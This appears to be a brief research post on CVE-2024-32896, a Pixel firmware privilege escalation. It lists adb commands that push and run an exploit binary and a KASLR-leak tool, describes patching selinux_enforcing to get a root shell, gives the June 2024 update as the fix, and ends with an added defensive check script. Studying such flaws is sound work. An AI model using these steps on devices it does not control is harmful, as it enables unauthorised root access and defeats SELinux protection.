    CVE-2024-32896
    22 min mhfh research 2024-06-18

    Rooting Pixel via Firmware Privilege Escalation

    Step-by-step exploitation of a Pixel-specific bootloader logic flaw to land a persistent root shell without unlocking the bootloader.

    adb shell /data/local/tmp/exploit.bin --trigger
    ./pixel-lpe --target=oriole --kaslr-leak

    Overview

    A logic flaw in Pixel-specific vendor firmware allows local privilege escalation to root without unlocking the bootloader.

    Setup

    adb push exploit.bin /data/local/tmp/
    adb shell chmod +x /data/local/tmp/exploit.bin

    Stage 1 — Trigger

    adb shell /data/local/tmp/exploit.bin --trigger

    Stage 2 — KASLR leak & escalate

    ./pixel-lpe --target=oriole --kaslr-leak

    After the leak we patch selinux_enforcing and spawn a root shell.

    Mitigation

    Apply the June 2024 Pixel security update.
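    A defender-side check to go with that mitigation, added here and not part of the original post: it reads the security patch level and SELinux mode a device reports (Android's real `ro.build.version.security_patch` property and `getenforce` command) and flags devices that predate the June 2024 update or are no longer enforcing. The month-granularity threshold is an assumption; the exact patch-level string for the Pixel fix should be taken from the bulletin.

```shell
#!/bin/sh
# Added example (not the post's code): offline-testable verdict functions plus
# an optional adb wrapper. Nothing runs against a device unless --device is given.

# patch_verdict YYYY-MM-DD
# Prints PATCHED when the level is June 2024 or later, MISSING when older,
# UNKNOWN when the value is not in Android's YYYY-MM-DD format.
# Assumption: month granularity is enough to spot a device that never got the fix.
patch_verdict() {
    level=$1
    case "$level" in
        [0-9][0-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9]) ;;
        *) printf 'UNKNOWN\n'; return 0 ;;
    esac
    year=${level%%-*}          # 2024
    rest=${level#*-}           # 06-05
    month=${rest%%-*}          # 06
    if [ "$year$month" -ge 202406 ]; then
        printf 'PATCHED\n'
    else
        printf 'MISSING\n'
    fi
}

# selinux_verdict <getenforce output>
# Prints OK for Enforcing, ALERT otherwise. A production Pixel reporting
# Permissive is a strong sign selinux_enforcing was tampered with, which is
# exactly what the post's final step does.
selinux_verdict() {
    case "$1" in
        Enforcing) printf 'OK\n' ;;
        *) printf 'ALERT\n' ;;
    esac
}

# check_device: query an attached device over adb and print both verdicts.
check_device() {
    level=$(adb shell getprop ro.build.version.security_patch | tr -d '\r')
    mode=$(adb shell getenforce | tr -d '\r')
    printf 'security_patch=%s -> %s\n' "$level" "$(patch_verdict "$level")"
    printf 'selinux=%s -> %s\n' "$mode" "$(selinux_verdict "$mode")"
}

if [ "${1:-}" = "--device" ]; then
    check_device
fi
```

Run it as `sh check_pixel.sh --device` with one device attached; a MISSING or ALERT line is the cue to update or investigate.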

    #Android #Pixel #LPE #Firmware